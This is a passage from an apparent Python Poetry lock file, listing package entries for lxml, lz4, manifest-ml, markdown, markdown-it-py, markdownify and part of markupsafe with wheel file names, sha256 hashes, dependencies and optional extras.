{file = "lxml-4.9.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:ae8b9c6deb1e634ba4f1930eb67ef6e6bf6a44b6eb5ad605642b2d6d5ed9ce3c"},
{file = "lxml-4.9.3-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:411007c0d88188d9f621b11d252cce90c4a2d1a49db6c068e3c16422f306eab8"},
{file = "lxml-4.9.3-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:cd47b4a0d41d2afa3e58e5bf1f62069255aa2fd6ff5ee41604418ca925911d76"},
{file = "lxml-4.9.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:0e2cb47860da1f7e9a5256254b74ae331687b9672dfa780eed355c4c9c3dbd23"},
{file = "lxml-4.9.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:1247694b26342a7bf47c02e513d32225ededd18045264d40758abeb3c838a51f"},
{file = "lxml-4.9.3-cp310-cp310-win32.whl", hash = "sha256:cdb650fc86227eba20de1a29d4b2c1bfe139dc75a0669270033cb2ea3d391b85"},
{file = "lxml-4.9.3-cp310-cp310-win_amd64.whl", hash = "sha256:97047f0d25cd4bcae81f9ec9dc290ca3e15927c192df17331b53bebe0e3ff96d"},
{file = "lxml-4.9.3-cp311-cp311-macosx_11_0_universal2.whl", hash = "sha256:1f447ea5429b54f9582d4b955f5f1985f278ce5cf169f72eea8afd9502973dd5"},
{file = "lxml-4.9.3-cp311-cp311-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:57d6ba0ca2b0c462f339640d22882acc711de224d769edf29962b09f77129cbf"},
{file = "lxml-4.9.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:9767e79108424fb6c3edf8f81e6730666a50feb01a328f4a016464a5893f835a"},
{file = "lxml-4.9.3-cp311-cp311-manylinux_2_28_aarch64.whl", hash = "sha256:71c52db65e4b56b8ddc5bb89fb2e66c558ed9d1a74a45ceb7dcb20c191c3df2f"},
{file = "lxml-4.9.3-cp311-cp311-manylinux_2_28_x86_64.whl", hash = "sha256:d73d8ecf8ecf10a3bd007f2192725a34bd62898e8da27eb9d32a58084f93962b"},
{file = "lxml-4.9.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:0a3d3487f07c1d7f150894c238299934a2a074ef590b583103a45002035be120"},
{file = "lxml-4.9.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:9e28c51fa0ce5674be9f560c6761c1b441631901993f76700b1b30ca6c8378d6"},
{file = "lxml-4.9.3-cp311-cp311-win32.whl", hash = "sha256:0bfd0767c5c1de2551a120673b72e5d4b628737cb05414f03c3277bf9bed3305"},
{file = "lxml-4.9.3-cp311-cp311-win_amd64.whl", hash = "sha256:25f32acefac14ef7bd53e4218fe93b804ef6f6b92ffdb4322bb6d49d94cad2bc"},
{file = "lxml-4.9.3-cp312-cp312-macosx_11_0_universal2.whl", hash = "sha256:d3ff32724f98fbbbfa9f49d82852b159e9784d6094983d9a8b7f2ddaebb063d4"},
{file = "lxml-4.9.3-cp312-cp312-manylinux_2_28_aarch64.whl", hash = "sha256:48d6ed886b343d11493129e019da91d4039826794a3e3027321c56d9e71505be"},
{file = "lxml-4.9.3-cp312-cp312-manylinux_2_28_x86_64.whl", hash = "sha256:9a92d3faef50658dd2c5470af249985782bf754c4e18e15afb67d3ab06233f13"},
{file = "lxml-4.9.3-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:b4e4bc18382088514ebde9328da057775055940a1f2e18f6ad2d78aa0f3ec5b9"},
{file = "lxml-4.9.3-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:fc9b106a1bf918db68619fdcd6d5ad4f972fdd19c01d19bdb6bf63f3589a9ec5"},
{file = "lxml-4.9.3-cp312-cp312-win_amd64.whl", hash = "sha256:d37017287a7adb6ab77e1c5bee9bcf9660f90ff445042b790402a654d2ad81d8"},
{file = "lxml-4.9.3-cp35-cp35m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:56dc1f1ebccc656d1b3ed288f11e27172a01503fc016bcabdcbc0978b19352b7"},
{file = "lxml-4.9.3-cp35-cp35m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:578695735c5a3f51569810dfebd05dd6f888147a34f0f98d4bb27e92b76e05c2"},
{file = "lxml-4.9.3-cp35-cp35m-win32.whl", hash = "sha256:704f61ba8c1283c71b16135caf697557f5ecf3e74d9e453233e4771d68a1f42d"},
{file = "lxml-4.9.3-cp35-cp35m-win_amd64.whl", hash = "sha256:c41bfca0bd3532d53d16fd34d20806d5c2b1ace22a2f2e4c0008570bf2c58833"},
{file = "lxml-4.9.3-cp36-cp36m-macosx_11_0_x86_64.whl", hash = "sha256:64f479d719dc9f4c813ad9bb6b28f8390360660b73b2e4beb4cb0ae7104f1c12"},
{file = "lxml-4.9.3-cp36-cp36m-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:dd708cf4ee4408cf46a48b108fb9427bfa00b9b85812a9262b5c668af2533ea5"},
{file = "lxml-4.9.3-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5c31c7462abdf8f2ac0577d9f05279727e698f97ecbb02f17939ea99ae8daa98"},
{file = "lxml-4.9.3-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:e3cd95e10c2610c360154afdc2f1480aea394f4a4f1ea0a5eacce49640c9b190"},
{file = "lxml-4.9.3-cp36-cp36m-manylinux_2_28_x86_64.whl", hash = "sha256:4930be26af26ac545c3dffb662521d4e6268352866956672231887d18f0eaab2"},
{file = "lxml-4.9.3-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:4aec80cde9197340bc353d2768e2a75f5f60bacda2bab72ab1dc499589b3878c"},
{file = "lxml-4.9.3-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:14e019fd83b831b2e61baed40cab76222139926b1fb5ed0e79225bc0cae14584"},
{file = "lxml-4.9.3-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:0c0850c8b02c298d3c7006b23e98249515ac57430e16a166873fc47a5d549287"},
{file = "lxml-4.9.3-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:aca086dc5f9ef98c512bac8efea4483eb84abbf926eaeedf7b91479feb092458"},
{file = "lxml-4.9.3-cp36-cp36m-win32.whl", hash = "sha256:50baa9c1c47efcaef189f31e3d00d697c6d4afda5c3cde0302d063492ff9b477"},
{file = "lxml-4.9.3-cp36-cp36m-win_amd64.whl", hash = "sha256:bef4e656f7d98aaa3486d2627e7d2df1157d7e88e7efd43a65aa5dd4714916cf"},
{file = "lxml-4.9.3-cp37-cp37m-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:46f409a2d60f634fe550f7133ed30ad5321ae2e6630f13657fb9479506b00601"},
{file = "lxml-4.9.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.manylinux_2_24_aarch64.whl", hash = "sha256:4c28a9144688aef80d6ea666c809b4b0e50010a2aca784c97f5e6bf143d9f129"},
{file = "lxml-4.9.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:141f1d1a9b663c679dc524af3ea1773e618907e96075262726c7612c02b149a4"},
{file = "lxml-4.9.3-cp37-cp37m-manylinux_2_28_x86_64.whl", hash = "sha256:53ace1c1fd5a74ef662f844a0413446c0629d151055340e9893da958a374f70d"},
{file = "lxml-4.9.3-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:17a753023436a18e27dd7769e798ce302963c236bc4114ceee5b25c18c52c693"},
{file = "lxml-4.9.3-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:7d298a1bd60c067ea75d9f684f5f3992c9d6766fadbc0bcedd39750bf344c2f4"},
{file = "lxml-4.9.3-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:081d32421db5df44c41b7f08a334a090a545c54ba977e47fd7cc2deece78809a"},
{file = "lxml-4.9.3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:23eed6d7b1a3336ad92d8e39d4bfe09073c31bfe502f20ca5116b2a334f8ec02"},
{file = "lxml-4.9.3-cp37-cp37m-win32.whl", hash = "sha256:1509dd12b773c02acd154582088820893109f6ca27ef7291b003d0e81666109f"},
{file = "lxml-4.9.3-cp37-cp37m-win_amd64.whl", hash = "sha256:120fa9349a24c7043854c53cae8cec227e1f79195a7493e09e0c12e29f918e52"},
{file = "lxml-4.9.3-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:4d2d1edbca80b510443f51afd8496be95529db04a509bc8faee49c7b0fb6d2cc"},
{file = "lxml-4.9.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.manylinux_2_24_aarch64.whl", hash = "sha256:8d7e43bd40f65f7d97ad8ef5c9b1778943d02f04febef12def25f7583d19baac"},
{file = "lxml-4.9.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:71d66ee82e7417828af6ecd7db817913cb0cf9d4e61aa0ac1fde0583d84358db"},
{file = "lxml-4.9.3-cp38-cp38-manylinux_2_28_x86_64.whl", hash = "sha256:6fc3c450eaa0b56f815c7b62f2b7fba7266c4779adcf1cece9e6deb1de7305ce"},
{file = "lxml-4.9.3-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:65299ea57d82fb91c7f019300d24050c4ddeb7c5a190e076b5f48a2b43d19c42"},
{file = "lxml-4.9.3-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:eadfbbbfb41b44034a4c757fd5d70baccd43296fb894dba0295606a7cf3124aa"},
{file = "lxml-4.9.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:3e9bdd30efde2b9ccfa9cb5768ba04fe71b018a25ea093379c857c9dad262c40"},
{file = "lxml-4.9.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:fcdd00edfd0a3001e0181eab3e63bd5c74ad3e67152c84f93f13769a40e073a7"},
{file = "lxml-4.9.3-cp38-cp38-win32.whl", hash = "sha256:57aba1bbdf450b726d58b2aea5fe47c7875f5afb2c4a23784ed78f19a0462574"},
{file = "lxml-4.9.3-cp38-cp38-win_amd64.whl", hash = "sha256:92af161ecbdb2883c4593d5ed4815ea71b31fafd7fd05789b23100d081ecac96"},
{file = "lxml-4.9.3-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:9bb6ad405121241e99a86efff22d3ef469024ce22875a7ae045896ad23ba2340"},
{file = "lxml-4.9.3-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:8ed74706b26ad100433da4b9d807eae371efaa266ffc3e9191ea436087a9d6a7"},
{file = "lxml-4.9.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:fbf521479bcac1e25a663df882c46a641a9bff6b56dc8b0fafaebd2f66fb231b"},
{file = "lxml-4.9.3-cp39-cp39-manylinux_2_28_aarch64.whl", hash = "sha256:303bf1edce6ced16bf67a18a1cf8339d0db79577eec5d9a6d4a80f0fb10aa2da"},
{file = "lxml-4.9.3-cp39-cp39-manylinux_2_28_x86_64.whl", hash = "sha256:5515edd2a6d1a5a70bfcdee23b42ec33425e405c5b351478ab7dc9347228f96e"},
{file = "lxml-4.9.3-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:690dafd0b187ed38583a648076865d8c229661ed20e48f2335d68e2cf7dc829d"},
{file = "lxml-4.9.3-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:b6420a005548ad52154c8ceab4a1290ff78d757f9e5cbc68f8c77089acd3c432"},
{file = "lxml-4.9.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:bb3bb49c7a6ad9d981d734ef7c7193bc349ac338776a0360cc671eaee89bcf69"},
{file = "lxml-4.9.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:d27be7405547d1f958b60837dc4c1007da90b8b23f54ba1f8b728c78fdb19d50"},
{file = "lxml-4.9.3-cp39-cp39-win32.whl", hash = "sha256:8df133a2ea5e74eef5e8fc6f19b9e085f758768a16e9877a60aec455ed2609b2"},
{file = "lxml-4.9.3-cp39-cp39-win_amd64.whl", hash = "sha256:4dd9a263e845a72eacb60d12401e37c616438ea2e5442885f65082c276dfb2b2"},
{file = "lxml-4.9.3-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:6689a3d7fd13dc687e9102a27e98ef33730ac4fe37795d5036d18b4d527abd35"},
{file = "lxml-4.9.3-pp37-pypy37_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:f6bdac493b949141b733c5345b6ba8f87a226029cbabc7e9e121a413e49441e0"},
{file = "lxml-4.9.3-pp37-pypy37_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:05186a0f1346ae12553d66df1cfce6f251589fea3ad3da4f3ef4e34b2d58c6a3"},
{file = "lxml-4.9.3-pp37-pypy37_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:c2006f5c8d28dee289f7020f721354362fa304acbaaf9745751ac4006650254b"},
{file = "lxml-4.9.3-pp38-pypy38_pp73-macosx_11_0_x86_64.whl", hash = "sha256:5c245b783db29c4e4fbbbfc9c5a78be496c9fea25517f90606aa1f6b2b3d5f7b"},
{file = "lxml-4.9.3-pp38-pypy38_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:4fb960a632a49f2f089d522f70496640fdf1218f1243889da3822e0a9f5f3ba7"},
{file = "lxml-4.9.3-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:50670615eaf97227d5dc60de2dc99fb134a7130d310d783314e7724bf163f75d"},
{file = "lxml-4.9.3-pp38-pypy38_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:9719fe17307a9e814580af1f5c6e05ca593b12fb7e44fe62450a5384dbf61b4b"},
{file = "lxml-4.9.3-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:3331bece23c9ee066e0fb3f96c61322b9e0f54d775fccefff4c38ca488de283a"},
{file = "lxml-4.9.3-pp39-pypy39_pp73-macosx_11_0_x86_64.whl", hash = "sha256:ed667f49b11360951e201453fc3967344d0d0263aa415e1619e85ae7fd17b4e0"},
{file = "lxml-4.9.3-pp39-pypy39_pp73-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_24_i686.whl", hash = "sha256:8b77946fd508cbf0fccd8e400a7f71d4ac0e1595812e66025bac475a8e811694"},
{file = "lxml-4.9.3-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux_2_24_x86_64.whl", hash = "sha256:e4da8ca0c0c0aea88fd46be8e44bd49716772358d648cce45fe387f7b92374a7"},
{file = "lxml-4.9.3-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:fe4bda6bd4340caa6e5cf95e73f8fea5c4bfc55763dd42f1b50a94c1b4a2fbd4"},
{file = "lxml-4.9.3-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:f3df3db1d336b9356dd3112eae5f5c2b8b377f3bc826848567f10bfddfee77e9"},
{file = "lxml-4.9.3.tar.gz", hash = "sha256:48628bd53a426c9eb9bc066a923acaa0878d1e86129fd5359aee99285f4eed9c"},
]
[package.extras]
cssselect = ["cssselect (>=0.7)"]
html5 = ["html5lib"]
htmlsoup = ["BeautifulSoup4"]
source = ["Cython (>=0.29.35)"]
[[package]]
name = "lz4"
version = "4.3.2"
description = "LZ4 Bindings for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "lz4-4.3.2-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1c4c100d99eed7c08d4e8852dd11e7d1ec47a3340f49e3a96f8dfbba17ffb300"},
{file = "lz4-4.3.2-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:edd8987d8415b5dad25e797043936d91535017237f72fa456601be1479386c92"},
{file = "lz4-4.3.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f7c50542b4ddceb74ab4f8b3435327a0861f06257ca501d59067a6a482535a77"},
{file = "lz4-4.3.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0f5614d8229b33d4a97cb527db2a1ac81308c6e796e7bdb5d1309127289f69d5"},
{file = "lz4-4.3.2-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8f00a9ba98f6364cadda366ae6469b7b3568c0cced27e16a47ddf6b774169270"},
{file = "lz4-4.3.2-cp310-cp310-win32.whl", hash = "sha256:b10b77dc2e6b1daa2f11e241141ab8285c42b4ed13a8642495620416279cc5b2"},
{file = "lz4-4.3.2-cp310-cp310-win_amd64.whl", hash = "sha256:86480f14a188c37cb1416cdabacfb4e42f7a5eab20a737dac9c4b1c227f3b822"},
{file = "lz4-4.3.2-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:7c2df117def1589fba1327dceee51c5c2176a2b5a7040b45e84185ce0c08b6a3"},
{file = "lz4-4.3.2-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1f25eb322eeb24068bb7647cae2b0732b71e5c639e4e4026db57618dcd8279f0"},
{file = "lz4-4.3.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8df16c9a2377bdc01e01e6de5a6e4bbc66ddf007a6b045688e285d7d9d61d1c9"},
{file = "lz4-4.3.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f571eab7fec554d3b1db0d666bdc2ad85c81f4b8cb08906c4c59a8cad75e6e22"},
{file = "lz4-4.3.2-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7211dc8f636ca625abc3d4fb9ab74e5444b92df4f8d58ec83c8868a2b0ff643d"},
{file = "lz4-4.3.2-cp311-cp311-win32.whl", hash = "sha256:867664d9ca9bdfce840ac96d46cd8838c9ae891e859eb98ce82fcdf0e103a947"},
{file = "lz4-4.3.2-cp311-cp311-win_amd64.whl", hash = "sha256:a6a46889325fd60b8a6b62ffc61588ec500a1883db32cddee9903edfba0b7584"},
{file = "lz4-4.3.2-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:3a85b430138882f82f354135b98c320dafb96fc8fe4656573d95ab05de9eb092"},
{file = "lz4-4.3.2-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:65d5c93f8badacfa0456b660285e394e65023ef8071142e0dcbd4762166e1be0"},
{file = "lz4-4.3.2-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6b50f096a6a25f3b2edca05aa626ce39979d63c3b160687c8c6d50ac3943d0ba"},
{file = "lz4-4.3.2-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:200d05777d61ba1ff8d29cb51c534a162ea0b4fe6d3c28be3571a0a48ff36080"},
{file = "lz4-4.3.2-cp37-cp37m-win32.whl", hash = "sha256:edc2fb3463d5d9338ccf13eb512aab61937be50aa70734bcf873f2f493801d3b"},
{file = "lz4-4.3.2-cp37-cp37m-win_amd64.whl", hash = "sha256:83acfacab3a1a7ab9694333bcb7950fbeb0be21660d236fd09c8337a50817897"},
{file = "lz4-4.3.2-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:7a9eec24ec7d8c99aab54de91b4a5a149559ed5b3097cf30249b665689b3d402"},
{file = "lz4-4.3.2-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:31d72731c4ac6ebdce57cd9a5cabe0aecba229c4f31ba3e2c64ae52eee3fdb1c"},
{file = "lz4-4.3.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:83903fe6db92db0be101acedc677aa41a490b561567fe1b3fe68695b2110326c"},
{file = "lz4-4.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:926b26db87ec8822cf1870efc3d04d06062730ec3279bbbd33ba47a6c0a5c673"},
{file = "lz4-4.3.2-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e05afefc4529e97c08e65ef92432e5f5225c0bb21ad89dee1e06a882f91d7f5e"},
{file = "lz4-4.3.2-cp38-cp38-win32.whl", hash = "sha256:ad38dc6a7eea6f6b8b642aaa0683253288b0460b70cab3216838747163fb774d"},
{file = "lz4-4.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:7e2dc1bd88b60fa09b9b37f08553f45dc2b770c52a5996ea52b2b40f25445676"},
{file = "lz4-4.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:edda4fb109439b7f3f58ed6bede59694bc631c4b69c041112b1b7dc727fffb23"},
{file = "lz4-4.3.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:0ca83a623c449295bafad745dcd399cea4c55b16b13ed8cfea30963b004016c9"},
{file = "lz4-4.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d5ea0e788dc7e2311989b78cae7accf75a580827b4d96bbaf06c7e5a03989bd5"},
{file = "lz4-4.3.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a98b61e504fb69f99117b188e60b71e3c94469295571492a6468c1acd63c37ba"},
{file = "lz4-4.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4931ab28a0d1c133104613e74eec1b8bb1f52403faabe4f47f93008785c0b929"},
{file = "lz4-4.3.2-cp39-cp39-win32.whl", hash = "sha256:ec6755cacf83f0c5588d28abb40a1ac1643f2ff2115481089264c7630236618a"},
{file = "lz4-4.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:4caedeb19e3ede6c7a178968b800f910db6503cb4cb1e9cc9221157572139b49"},
{file = "lz4-4.3.2.tar.gz", hash = "sha256:e1431d84a9cfb23e6773e72078ce8e65cad6745816d4cbf9ae67da5ea419acda"},
]
[package.extras]
docs = ["sphinx (>=1.6.0)", "sphinx-bootstrap-theme"]
flake8 = ["flake8"]
tests = ["psutil", "pytest (!=3.3.0)", "pytest-cov"]
[[package]]
name = "manifest-ml"
version = "0.0.1"
description = "Manifest for Prompt Programming Foundation Models."
optional = true
python-versions = ">=3.8.0"
files = [
{file = "manifest-ml-0.0.1.tar.gz", hash = "sha256:f828faf7de41fad5318254beec08acdf5142196e0e22203a4047412c2d3127a0"},
{file = "manifest_ml-0.0.1-py2.py3-none-any.whl", hash = "sha256:fc4e62e706fd767fd8851d91051fdb71bc79b2df9c66f5879736c46d8163a316"},
]
[package.dependencies]
dill = ">=0.3.5"
redis = ">=4.3.1"
requests = ">=2.27.1"
sqlitedict = ">=2.0.0"
tqdm = ">=4.64.0"
[package.extras]
all = ["Flask (>=2.1.2)", "accelerate (>=0.10.0)", "autopep8 (>=1.6.0)", "black (>=22.3.0)", "docformatter (>=1.4)", "flake8 (>=4.0.0)", "flake8-docstrings (>=1.6.0)", "isort (>=5.9.3)", "mypy (>=0.950)", "nbsphinx (>=0.8.0)", "pep8-naming (>=0.12.1)", "pre-commit (>=2.14.0)", "pytest (>=7.0.0)", "pytest-cov (>=3.0.0)", "python-dotenv (>=0.20.0)", "recommonmark (>=0.7.1)", "sphinx-autobuild", "sphinx-rtd-theme (>=0.5.1)", "torch (>=1.8.0)", "transformers (>=4.20.0)", "twine", "types-PyYAML (>=6.0.7)", "types-protobuf (>=3.19.21)", "types-python-dateutil (>=2.8.16)", "types-redis (>=4.2.6)", "types-requests (>=2.27.29)", "types-setuptools (>=57.4.17)"]
api = ["Flask (>=2.1.2)", "accelerate (>=0.10.0)", "torch (>=1.8.0)", "transformers (>=4.20.0)"]
dev = ["autopep8 (>=1.6.0)", "black (>=22.3.0)", "docformatter (>=1.4)", "flake8 (>=4.0.0)", "flake8-docstrings (>=1.6.0)", "isort (>=5.9.3)", "mypy (>=0.950)", "nbsphinx (>=0.8.0)", "pep8-naming (>=0.12.1)", "pre-commit (>=2.14.0)", "pytest (>=7.0.0)", "pytest-cov (>=3.0.0)", "python-dotenv (>=0.20.0)", "recommonmark (>=0.7.1)", "sphinx-autobuild", "sphinx-rtd-theme (>=0.5.1)", "twine", "types-PyYAML (>=6.0.7)", "types-protobuf (>=3.19.21)", "types-python-dateutil (>=2.8.16)", "types-redis (>=4.2.6)", "types-requests (>=2.27.29)", "types-setuptools (>=57.4.17)"]
[[package]]
name = "markdown"
version = "3.5"
description = "Python implementation of John Gruber's Markdown."
optional = true
python-versions = ">=3.8"
files = [
{file = "Markdown-3.5-py3-none-any.whl", hash = "sha256:4afb124395ce5fc34e6d9886dab977fd9ae987fc6e85689f08278cf0c69d4bf3"},
{file = "Markdown-3.5.tar.gz", hash = "sha256:a807eb2e4778d9156c8f07876c6e4d50b5494c5665c4834f67b06459dfd877b3"},
]
[package.extras]
docs = ["mdx-gh-links (>=0.2)", "mkdocs (>=1.5)", "mkdocs-gen-files", "mkdocs-literate-nav", "mkdocs-nature (>=0.6)", "mkdocs-section-index", "mkdocstrings[python]"]
testing = ["coverage", "pyyaml"]
[[package]]
name = "markdown-it-py"
version = "3.0.0"
description = "Python port of markdown-it. Markdown parsing, done right!"
optional = true
python-versions = ">=3.8"
files = [
{file = "markdown-it-py-3.0.0.tar.gz", hash = "sha256:e3f60a94fa066dc52ec76661e37c851cb232d92f9886b15cb560aaada2df8feb"},
{file = "markdown_it_py-3.0.0-py3-none-any.whl", hash = "sha256:355216845c60bd96232cd8d8c40e8f9765cc86f46880e43a8fd22dc1a1a8cab1"},
]
[package.dependencies]
mdurl = ">=0.1,<1.0"
[package.extras]
benchmarking = ["psutil", "pytest", "pytest-benchmark"]
code-style = ["pre-commit (>=3.0,<4.0)"]
compare = ["commonmark (>=0.9,<1.0)", "markdown (>=3.4,<4.0)", "mistletoe (>=1.0,<2.0)", "mistune (>=2.0,<3.0)", "panflute (>=2.3,<3.0)"]
linkify = ["linkify-it-py (>=1,<3)"]
plugins = ["mdit-py-plugins"]
profiling = ["gprof2dot"]
rtd = ["jupyter_sphinx", "mdit-py-plugins", "myst-parser", "pyyaml", "sphinx", "sphinx-copybutton", "sphinx-design", "sphinx_book_theme"]
testing = ["coverage", "pytest", "pytest-cov", "pytest-regressions"]
[[package]]
name = "markdownify"
version = "0.11.6"
description = "Convert HTML to markdown."
optional = true
python-versions = "*"
files = [
{file = "markdownify-0.11.6-py3-none-any.whl", hash = "sha256:ba35fe289d5e9073bcd7d2cad629278fe25f1a93741fcdc0bfb4f009076d8324"},
{file = "markdownify-0.11.6.tar.gz", hash = "sha256:009b240e0c9f4c8eaf1d085625dcd4011e12f0f8cec55dedf9ea6f7655e49bfe"},
]
[package.dependencies]
beautifulsoup4 = ">=4.9,<5"
six = ">=1.15,<2"
[[package]]
name = "markupsafe"
version = "2.1.3"
description = "Safely add untrusted strings to HTML/XML markup."
optional = false
python-versions = ">=3.7"
files = [
{file = "MarkupSafe-2.1.3-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:cd0f502fe016460680cd20aaa5a76d241d6f35a1c3350c474bac1273803893fa"},
{file = "MarkupSafe-2.1.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:e09031c87a1e51556fdcb46e5bd4f59dfb743061cf93c4d6831bf894f125eb57"},
{file = "MarkupSafe-2.1.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:68e78619a61ecf91e76aa3e6e8e33fc4894a2bebe93410754bd28fce0a8a4f9f"},
{file = "MarkupSafe-2.1.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:65c1a9bcdadc6c28eecee2c119465aebff8f7a584dd719facdd9e825ec61ab52"},
{file = "MarkupSafe-2.1.3-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:525808b8019e36eb524b8c68acdd63a37e75714eac50e988180b169d64480a00"},
{file = "MarkupSafe-2.1.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:962f82a3086483f5e5f64dbad880d31038b698494799b097bc59c2edf392fce6"},
{file = "MarkupSafe-2.1.3-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:aa7bd130efab1c280bed0f45501b7c8795f9fdbeb02e965371bbef3523627779"},
{file = "MarkupSafe-2.1.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c9c804664ebe8f83a211cace637506669e7890fec1b4195b505c214e50dd4eb7"},
{file = "MarkupSafe-2.1.3-cp310-cp310-win32.whl", hash = "sha256:10bbfe99883db80bdbaff2dcf681dfc6533a614f700da1287707e8a5d78a8431"},
